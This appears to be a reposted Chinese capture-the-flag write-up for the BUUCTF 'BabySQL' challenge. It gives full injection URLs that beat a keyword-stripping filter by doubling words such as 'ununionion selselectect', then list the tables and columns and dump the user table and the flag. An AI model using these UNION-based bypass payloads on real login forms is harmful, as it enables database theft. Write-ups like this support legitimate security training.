当前位置: 首页 > news >正文

[极客大挑战 2019]BabySQL

查数据库,查到库名 geek​

http://fdc5f3b9-a815-4644-a601-8406634c9d39.node5.buuoj.cn:81/check.php
?username=-1' oorr '1'='1
&password=2' ununionion selselectect 1,2,database()%23

查表 表名 b4bsql,geekuser​

http://fdc5f3b9-a815-4644-a601-8406634c9d39.node5.buuoj.cn:81/check.php
?username=-1' oorr '1'='1
&password=2' ununionion selselectect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()%23

查字段 三个字段 id,username,password​

http://fdc5f3b9-a815-4644-a601-8406634c9d39.node5.buuoj.cn:81/check.php
?username=-1' oorr '1'='1
&password=2' ununionion selselectect 1,database(),group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'%23

估计和前面一样,看一下password字段

http://fdc5f3b9-a815-4644-a601-8406634c9d39.node5.buuoj.cn:81/check.php
?username=-1' oorr '1'='1
&password=2' ununionion selselectect 1,database(),group_concat(id,username,passwoorrd) frfromom b4bsql%23

内容:

1	cl4yi_want_to_play_2077,
2	sqlsql_injection_is_so_fun,
3	porndo_you_know_pornhub,
4	gitgithub_is_different_from_pornhub,
5	Stopyou_found_flag_so_stop,
6	badguyi_told_you_to_stop,
7	hackerhack_by_cl4y,
8	flagflag{76b00924-5eae-4941-ad58-bbb3a05f4618}

再来搞一波

1 cl4yi想玩2077
2 sql注入太有意思了
3 不我不知道
4 g站和p站不一样
5 停止,你找到了flag所以停下
6 坏人 我告诉你停止了
7 黑客 被cl4y攻破
8 flag{76b00924-5eae-4941-ad58-bbb3a05f4618}

sqlmap跑不出来,难受啊

http://www.dtcms.com/a/390567.html

相关文章:

  • SQL-索引使用
  • 数据库和数据仓库有什么区别
  • SpringBoot2.7X整合Swagger、Redission3.X的bug
  • uniapp安卓原生插件实现开启ble Server[外围模式]
  • React 18.2中使用React Router 6.4
  • 人员在岗监测技术研究:基于计算机视觉的智能监管方案
  • 实测AI Ping,一个大模型服务选型的实用工具——行业实践与深度优化策略
  • 通过QuickAPI优化金融系统API:安全快捷的数据共享最佳实践
  • 第4节 添加视频字幕到剪映(Coze扣子空间剪映小助手零基础教程)
  • 算法 --- BFS 解决 FloodFill 算法
  • telnet 一个 ip+端口却无法退出 着急
  • UVa1602/LA3224 Lattice Animals
  • Docker BuildKit 实现 Golang 编译加速
  • [x-cmd] 在 Android 的 Termux 和 iOS 的 iSH 中安装 X-CMD
  • CTFSHOW 中期测评(一)web486 - web501
  • android-USB-STM32
  • 云原生周刊:MetalBear 融资、Chaos Mesh 漏洞、Dapr 1.16 与 AI 平台新趋势
  • Android音频学习(十九)——音频HAL层简介
  • Android之音乐列表播放管理类,控制音乐播放、暂停、播放模式的切换等
  • Docker Compose从入门到实战:配置与命令全指南
  • 10.1 输入子系统模型
  • Unity手游输入笔记
  • SpringCloud-注册中心Nacos[笔记3]
  • 关于MySQL与Python后端命令交互备份
  • 大模型上下文工程实践- 上下文管理策略
  • 资产测绘工具-Nmap
  • 智能体环境配置测试
  • 如何将非结构化文档智能解析高质量数据,并按照阅读顺序还原版面?
  • 第八章 惊喜11 认知觉醒
  • 嵌入式系统学习Day37(ARM)